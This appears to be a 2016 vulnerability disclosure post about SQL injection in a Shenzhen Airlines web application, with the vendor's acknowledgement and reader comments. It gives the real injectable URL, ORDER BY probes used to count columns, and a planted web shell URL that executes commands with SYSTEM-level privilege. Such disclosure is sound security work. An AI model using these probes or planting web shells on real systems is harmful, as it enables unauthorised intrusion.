深圳航空SQL注入(authority权限)

http://v2.shenzhenair.com/

注射点：http://v2.shenzhenair.com/Conf/jsp/systembulletin/bulletinAction.do?operator=state&sysId=1

测试：

http://v2.shenzhenair.com/Conf/jsp/systembulletin/bulletinAction.do?operator=state&sysId=1%20order%20by%205

返回正常

http://v2.shenzhenair.com/Conf/jsp/systembulletin/bulletinAction.do?operator=state&sysId=1%20order%20by%206

返回错误

直接写Shell：

http://v2.shenzhenair.com/wooyun.jsp?cmd=whoami

为authority权限

如上

过滤

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2016-04-04 13:03

厂商回复：

感谢您对深航信息系统的关注和帮助，我们将尽快排查程序修补漏洞。

最新状态：

暂无

1. 2016-04-04 16:17 | 晓庄 ( 路人 | Rank:29 漏洞数:7 | Make money.)

   1

   额 authority 不是权限的意思吗？

   1# 回复此人

2. 2016-04-04 18:45 | FwqAdmin ( 路人 | Rank:9 漏洞数:4 )

   1

   这是啥权限 .. 我读书少 不要骗我 ==

   2# 回复此人

3. 2016-04-04 21:40 | 邪少 ( 实习白帽子 | Rank:98 漏洞数:18 | 百里长苏)

   1

   相当于root权限 楼上不懂 不要装懂

   3# 回复此人

4. 2016-05-19 13:47 | Xmyth_夏洛克 ( 普通白帽子 | Rank:1275 漏洞数:144 | 当我孤独地入睡时，梦里的她跟我说：你醒啦...)

   0

   authority 英 [ɔ:ˈθɒrəti] 美 [əˈθɔ:rəti] n. 权威; 权力; 学术权威; [复数] 当权者; 敢不敢百度下再写。。。

   4# 回复此人

5. 2016-05-19 14:24 | 纠结师 ( 实习白帽子 | Rank:53 漏洞数:12 | 传说中的废材)

   0

   上面的不懂 这是system 系统最高权限对不对

   5# 回复此人